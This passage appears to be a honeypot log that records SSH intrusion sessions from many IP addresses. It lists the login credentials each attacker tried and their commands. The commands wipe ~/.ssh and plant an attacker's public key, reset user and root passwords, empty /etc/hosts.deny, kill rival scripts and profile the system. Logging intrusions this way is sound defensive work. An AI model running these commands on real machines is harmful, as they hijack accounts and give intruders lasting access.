$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—6 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—6 // CPU profiling
$ echo -e "im123\nLRBOJWGDlfsS\nLRBOJWGDlfsS"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "im123\nLRBOJWGDlfsS\nLRBOJWGDlfsS\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—6 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—6
$ ls -lh $(which ls) Γ—6
$ which ls Γ—6
$ crontab -l Γ—6 // persistence setup
$ w Γ—6 // logged-in users check
$ uname -m Γ—6
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—6 // CPU profiling
$ top Γ—6 // process monitoring
$ uname Γ—6 // OS identification
$ uname -a Γ—6 // OS/kernel identification
$ whoami Γ—6 // privilege check
$ lscpu | grep Model Γ—6
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—6
$ echo -e "123456\nkuP76bz2FWl4\nkuP76bz2FWl4"|passwd|bash
$ echo "123456\nkuP76bz2FWl4\nkuP76bz2FWl4\n"|passwd
$ echo "root:vlMQWWCcUX79"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—4 // execute from /tmp
$ echo "root:Sh3UHlztMFI7"|chpasswd|bash
$ echo "root:IWVD82h1cVlo"|chpasswd|bash
$ echo "root:HtZ29xpMvZPl"|chpasswd|bash
🎭 rogue_root_25 (157.15.73.34) β€” Trucuk, Indonesia Β· 4 sessions Β· 77 cmds
2026-05-17 15:17 EDT Β· as im/im123, root/GBHalso98, root/Test123
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo -e "im123\nrvGLDwzoOIxy\nrvGLDwzoOIxy"|passwd|bash
$ Enter new UNIX password:
$ echo "im123\nrvGLDwzoOIxy\nrvGLDwzoOIxy\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo "root:7eqJiMnzVwWZ"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ echo "root:aYAxBGpOkKXH"|chpasswd|bash
$ echo "root:dvhldY0ZbwgO"|chpasswd|bash
🎭 rogue_10 (83.68.86.250) β€” Mielec, Poland Β· 1 session Β· 20 cmds
2026-06-03 07:26 EDT Β· as email/123456
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\n5E4PWOSYsqg9\n5E4PWOSYsqg9"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\n5E4PWOSYsqg9\n5E4PWOSYsqg9\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_3 (165.154.23.36) β€” Hong Kong, Hong Kong Β· 2 sessions Β· 40 cmds
2026-06-03 07:12 EDT Β· as finland/123456, im/im123
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "123456\nn1wXIt8fwHEa\nn1wXIt8fwHEa"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "123456\nn1wXIt8fwHEa\nn1wXIt8fwHEa\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "im123\nXZBpSZd4CFv0\nXZBpSZd4CFv0"|passwd|bash
$ echo "im123\nXZBpSZd4CFv0\nXZBpSZd4CFv0\n"|passwd
🎭 cipher_root_36 (103.130.213.223) β€” Hanoi, Vietnam Β· 1 session Β· 20 cmds
2026-06-03 07:22 EDT Β· as sambauser/123
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123\nHTL6kLTUhVhL\nHTL6kLTUhVhL"|passwd|bash
$ Enter new UNIX password:
$ echo "123\nHTL6kLTUhVhL\nHTL6kLTUhVhL\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_6 (46.62.157.143) β€” Helsinki, Finland Β· 1 session Β· 20 cmds
2026-06-03 07:09 EDT Β· as rpa/123456
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\n4qrVRx7uNl6K\n4qrVRx7uNl6K"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\n4qrVRx7uNl6K\n4qrVRx7uNl6K\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_37 (103.143.231.24) β€” Kwai Chung, Hong Kong Β· 1 session Β· 20 cmds
2026-06-03 07:05 EDT Β· as finland/123456
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nmMS3CcqLRCuN\nmMS3CcqLRCuN"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nmMS3CcqLRCuN\nmMS3CcqLRCuN\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 fika (85.24.223.224) β€” UmeΓ₯, Sweden Β· 1 session Β· 20 cmds
2026-06-03 06:44 EDT Β· as horo/horo
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "horo\n8Dqc81kmB3FM\n8Dqc81kmB3FM"|passwd|bash
$ Enter new UNIX password:
$ echo "horo\n8Dqc81kmB3FM\n8Dqc81kmB3FM\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 silk_4 (14.103.102.130) β€” Beijing, China Β· 1 session Β· 20 cmds
2026-06-03 06:44 EDT Β· as cead/123456
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nawJgYWEgN9MT\nawJgYWEgN9MT"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nawJgYWEgN9MT\nawJgYWEgN9MT\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 panda (106.12.83.168) β€” Jinrongjie, China Β· 1 session Β· 20 cmds
2026-06-03 06:35 EDT Β· as csi/123456
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\noq2BOzvozqjv\noq2BOzvozqjv"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\noq2BOzvozqjv\noq2BOzvozqjv\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 pretzel_root_9 (135.125.196.70) β€” Limburg an der Lahn, Germany Β· 3 sessions Β· 59 cmds
2026-06-03 05:21 EDT Β· as devuser/devuser@2024, root/Wp123456@, vmail/123456
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:nkn1SDM9CBIJ"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "123456\nR7FWvuyEz49c\nR7FWvuyEz49c"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "123456\nR7FWvuyEz49c\nR7FWvuyEz49c\n"|passwd
$ echo -e "devuser@2024\n1lYGMcMs3irn\n1lYGMcMs3irn"|passwd|bash
$ echo "devuser@2024\n1lYGMcMs3irn\n1lYGMcMs3irn\n"|passwd
🎭 abba_root_2 (155.4.244.107) β€” Stockholm, Sweden Β· 6 sessions Β· 117 cmds
2026-05-22 22:13 EDT Β· as andong/andong123, ehsan/123, mahsa/1234
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—6 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—6 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—6 // CPU profiling
$ echo -e "1234\ncPiv4PfPg7M0\ncPiv4PfPg7M0"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "1234\ncPiv4PfPg7M0\ncPiv4PfPg7M0\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—6 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—6
$ ls -lh $(which ls) Γ—6
$ which ls Γ—6
$ crontab -l Γ—6 // persistence setup
$ w Γ—6 // logged-in users check
$ uname -m Γ—6
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—6 // CPU profiling
$ top Γ—6 // process monitoring
$ uname Γ—6 // OS identification
$ uname -a Γ—6 // OS/kernel identification
$ whoami Γ—6 // privilege check
$ lscpu | grep Model Γ—6
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—6
$ echo "root:xTFDNoQ9yFLR"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ echo "root:8XOJepxO0zar"|chpasswd|bash
$ echo "root:HQt9nEZ5M2uO"|chpasswd|bash
$ echo -e "123\nmNLX9V1ZBN8Y\nmNLX9V1ZBN8Y"|passwd|bash
$ echo "123\nmNLX9V1ZBN8Y\nmNLX9V1ZBN8Y\n"|passwd
$ echo -e "andong123\nYLOmmq5OHL0P\nYLOmmq5OHL0P"|passwd|bash
$ echo "andong123\nYLOmmq5OHL0P\nYLOmmq5OHL0P\n"|passwd
🎭 toucan_root_3 (187.110.238.50) β€” Fortaleza, Brazil Β· 4 sessions Β· 79 cmds
2026-05-07 21:43 EDT Β· as crmadmin/P@ssw0rd, mahsa/1234, root/admina
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo -e "1234\nswuvosQfeufd\nswuvosQfeufd"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "1234\nswuvosQfeufd\nswuvosQfeufd\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo -e "P@ssw0rd\nZX0impoUPdGL\nZX0impoUPdGL"|passwd|bash
$ echo "P@ssw0rd\nZX0impoUPdGL\nZX0impoUPdGL\n"|passwd
$ echo -e "555555555\n3zdFF7FxCE4e\n3zdFF7FxCE4e"|passwd|bash
$ echo "555555555\n3zdFF7FxCE4e\n3zdFF7FxCE4e\n"|passwd
$ echo "root:bzWkQKnqDMKY"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 monsoon_root_3 (165.140.164.99) β€” Hyderabad, India Β· 3 sessions Β· 59 cmds
2026-06-03 05:23 EDT Β· as devuser/devuser@2024, root/Wp123456@, vmail/123456
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
